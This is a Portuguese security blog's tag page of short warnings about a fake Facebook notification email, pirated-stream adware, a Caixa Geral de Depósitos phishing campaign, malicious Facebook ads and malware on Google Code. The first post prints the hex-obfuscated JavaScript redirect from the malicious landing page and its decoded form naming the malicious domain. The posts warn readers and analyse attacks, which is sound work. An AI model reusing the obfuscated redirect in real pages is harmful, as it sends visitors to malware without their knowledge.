Todos os posts tagados malware

Falsa notificação do Facebook leva a malware

Falsa notificação do Facebook leva a malware

Email que clona uma notificação do Facebook de novas mensagens encaminha para um site malicioso.

Assunto do email:

[Username], you have pending messages

Se a vítima clicar num dos dois botões que acompanham o email, este vai para o site:

ip_malicioso/~up1adstop/coldness.php

O código-fonte deste site (ofuscado):

bch1=”\x30″;yva2=”\x68\x74\x74\x70\x3A\x2F\x2F\x74\x61\x62\x6C\x65\x74\x6D\x65\x64
\x69\x63\x61\x72\x65\x73\x2E\x65\x75″;
setTimeout(“\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F
\x6E\x2E\x68\x72\x65\x66\x3D\x79\x76
\x61\x32\x3B”,bch1);

… que depois de traduzido reencaminha para outro site malicioso:

setTimeout(“window.top.location.href=http://tabletmedicares.eu”, 0);

De referir que o primeiro url é detectado pelos antivirus online  com uma taxa de 7/51 e que o alojamento web deste url é utilizado por diversos sites de phishing.

No segundo url, encontrei dois tipos de malware. Um que rouba a password do Facebook, instalando um plugin no browser, e outro que instala adware no sistema operativo.
Em ambos os casos, os antivirus mais comuns detectam e bloqueiam estes conteúdos maliciosos.

Se por acaso clicou num destes endereços, deverá verificar a presença de malware no seu sistema.

Transmissão online do Porto vs Benfica leva a malware

Transmissão online do Porto - Benfica leva a malware

Fica o alerta para os diversos links de supostas transmissões online do jogo de futebol Porto – Benfica, que irá ser transmitido hoje na Sport TV.
Alguns deles até podem mostrar o jogo mas ao mesmo tempo inundam a página com adware/malware.
Neste tipo de esquemas também já começam aparecer links com Likejacking, onde o utilizador ao clicar no botão Play, também está a Gostar de uma página/link no Facebook para poder ver a transmissão pirata. Desta forma este esquema propaga-se pela lista de amigos da vítima.

Tenham sempre em atenção os links que abrem e verifiquem sempre a sua veracidade.
Fica a dica.

Mensagem importante – Phishing da CGD

cgd_phishing2

Anda a circular pelas caixas de email dos portugueses um novo email de phishing do banco Caixa Geral de Depósitos. O remetente desta nova campanha fraudulenta é o email [email protected]. De salientar a semelhança com o endereço do banco – cgd.pt.
O ccgd.pt está registado desde 2006 na DNS.PT por um Centro de Contabilidade, Gestão e Desenvolvimento e poderá estar a ser vítima desta situação.
Os utilizadores maliciosos utilizam esta semelhança com o domínio do banco para ganhar alguma credibilidade e desta forma aumentar o número de vítimas.

O assunto da mensagem é Mensagem importante e informa o destinatário que houve diversas tentativas falhadas de autenticação na conta online e a mesma foi bloqueada como precaução. Para desbloquear terá de entrar num endereço fraudulento (detectado como endereço de phishing pelo VirusTotal  e como distribuidor de malware pelo Sucuri). Este endereço apresentava uma cópia do site da Caixa Geral de Depósitos que tinha como objectivo gravar a informação da vítima. No decorrer da escrita deste artigo, o site apresenta uma loja de comercialização de produtos relacionados com sexo.
Certamente irão surgir outros emails com outros links comprometidos e com páginas de phishing.

Como evitar este tipo de ataques:

  • Verificar sempre o endereço da barra de navegação do browser
  • As páginas das entidades bancárias tem sempre um certificado de segurança (o endereço começa por https)
  • As entidades bancárias nunca lhe vão solicitar informação por email
  • Fazer pesquisas nos motores de busca sobre o email

Para concluir, baseado no número de emails que tenho recebido pessoalmente e de utilizadores do WebSegura.net, circulam com grande actividade os emails de phishing da Apple, da Caixa Geral de Depósitos e do Montepio.

Gostaria de agradecer à Linxisp pelo contributo à elaboração este artigo.

Malware em anúncios do Facebook

Malware em anúncios do Facebook

Alguns anúncios pagos no Facebook estão a propagar malware perante os utilizadores que clicam no mesmo.

Os temas são bastante variados mas salientam-se os anúncios de:

  • Produtos para aumentar desempenho desportivo
  • Redes sociais para adultos
  • Jogos sociais

Pelo que tenho conhecimento, o Facebook na altura da moderação do anúncio verifica automaticamente (ou manualmente) pela veracidade e reputação do site. Claro que após validação do anúncio, muito provavelmente, o malware não é detetado pelo Facebook. Utilizando técnicas mais avançadas de ofuscar código, também é possível esconder e passar por alguns filtros desta rede social e dos antivirus.
Um dos ataques que obtive acesso aproveitava-se de uma falha XSS de um site bastante popular para dar maior credibilidade. O vector XSS inseria um formulário HTML com a informação a ser enviada para um site russo ao invés do site original.

Fica aqui o alerta para não clicarem em anúncios duvidosos e manter sempre o vosso software atualizado.

Google Code aloja malware

Google Code aloja malware - Foto cortesia da BlueCoat

Recentemente foi noticia na BlueCoat que o Google Code estava alojar malware numa das suas contas. De fato parece lamentável que os atuais proprietários do VirusTotal não utilizem o próprio API de um serviço interno para analisar ficheiros enviados por utilizadores. No exemplo demonstrado pela BlueCoat, ambos os ficheiros apresentavam uma taxa de deteção de 15/46 e 26/46.

Na minha opinião parece-me relativamente fácil bloquear o upload de malware ou outro conteúdo malicioso por parte do Google. Para tal, basta validar o upload do ficheiro no VirusTotal ou noutro sistema de análise de ficheiros. Pelo menos os malware mais comuns ficavam imediatamente barrados. Posteriormente, poderia haver algum tipo de moderação ou análise heurística desses mesmos ficheiros.

O Google Docs (agora Drive) também já teve relacionado com mesmo problema, quando utilizadores maliciosos utilizam o serviço para alojar PHP shells para RFIs (Remote File Inclusion). Algo que foi aparentemente corrigido.

Este tipo de alojamento no Google aumenta a suposta credibilidade do ficheiro e muitos utilizadores poderão ser afetados.

Estejam atentos e verifiquem sempre os ficheiros que descarregam, mesmo quando alojados em serviços do Google.